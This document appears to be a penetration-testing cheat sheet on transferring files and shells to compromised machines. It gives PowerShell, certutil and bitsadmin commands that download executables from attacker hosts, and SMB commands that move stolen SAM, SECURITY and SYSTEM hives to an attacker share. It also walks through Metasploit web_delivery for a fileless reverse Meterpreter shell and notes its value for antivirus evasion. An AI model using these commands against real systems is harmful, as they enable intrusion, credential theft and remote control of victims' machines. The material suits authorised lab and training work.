# Uploading Shells/ Transferring Files {% embed url="" %} windows cheatsheat {% endembed %} ### Transfer files with SSH (SCP) Best to copy to tmp folder as there are no restrictions mostly ```shell scp /opt/LinEnum.sh pingu@10.10.10.10:/tmp ``` ```shell scp ubuntu@192.168.1.30:/home/ubuntu/documents.txt notes.txt ``` ### Python server ```python python3 -m http.server ``` ### basic http-Server ``` http-server -p 8080 ``` ### Powershell downloading files ``` (new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou nd.ps1') from cmd powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')" ```

### Certutil cmd windows ``` certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe ``` ### RDP with shared folder to transfer filer - xfreerdp ``` xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads ``` ### Download files from server to machine in Windows ``` bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt ``` ### SMB Files tranfer with impacket start smb server on attacker machine ``` ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed ``` We can also use it without specifying username and password ``` ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed ``` And now you can make aval this share on the windows system as a separate drive ``` controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test The command completed successfully. ``` And now you can transfer files to and fro from both machines. ``` controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 1 file(s) copied. ``` We can also directly move files without setting it as drive. ``` C:\> move sam.save \\10.10.15.16\CompData 1 file(s) moved. C:\> move security.save \\10.10.15.16\CompData 1 file(s) moved. C:\> move system.save \\10.10.15.16\CompData 1 file(s) moved. ``` ### Evil-winrm You can use upload and download command to transfer files ``` Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip Info: Download successful! ``` ### Other web servers complete list {% embed url="" %}

### Getting a Meterpreter shell on a compromised Windows machine ``` exploit(multi/script/web_delivery) ```

* `exploit/`: Indicates the use of a module designed to take advantage of a specific vulnerability or system configuration to execute code. * `multi/`: Signifies that the module is cross-platform and can target multiple operating systems (Windows, Linux, macOS). * `script/`: Specifies that the exploit delivers its payload via a script (like PowerShell, Python, or PHP). * `web_delivery`: The name of the module that hosts a payload on a temporary web server. When the victim executes a specific one-liner command, it fetches and runs the payload in memory. *** #### Utility: PowerShell & Windows Reverse Meterpreter The primary utility of this module is to gain a fileless reverse shell. Instead of sending an `.exe` file that might be caught by antivirus, you provide a single PowerShell command to the target system. **1. Usage for Windows Reverse Meterpreter** To use this for a Windows target, you would configure the module within Metasploit as follows: * Set Target: `set TARGET 2` (This selects the PowerShell target, as seen in your screenshot where `target => 2`). * Set Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp` * Set Local Host: `set LHOST [Your_IP]` * Execute: Type `run` or `exploit`. **2. Full Use with PowerShell** Once you hit `run`, Metasploit will generate a unique PowerShell "one-liner." It looks something like this: `powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -RunAs [Encoded_Command_String]`

**Why this is effective:** * Antivirus Evasion: Because the payload is executed directly in memory via PowerShell, it never touches the hard drive, making it harder for standard antivirus programs to detect. * Simplicity: You only need a way to execute a single line of text on the victim's machine (e.g., via a compromised web server, a malicious shortcut, or a macro).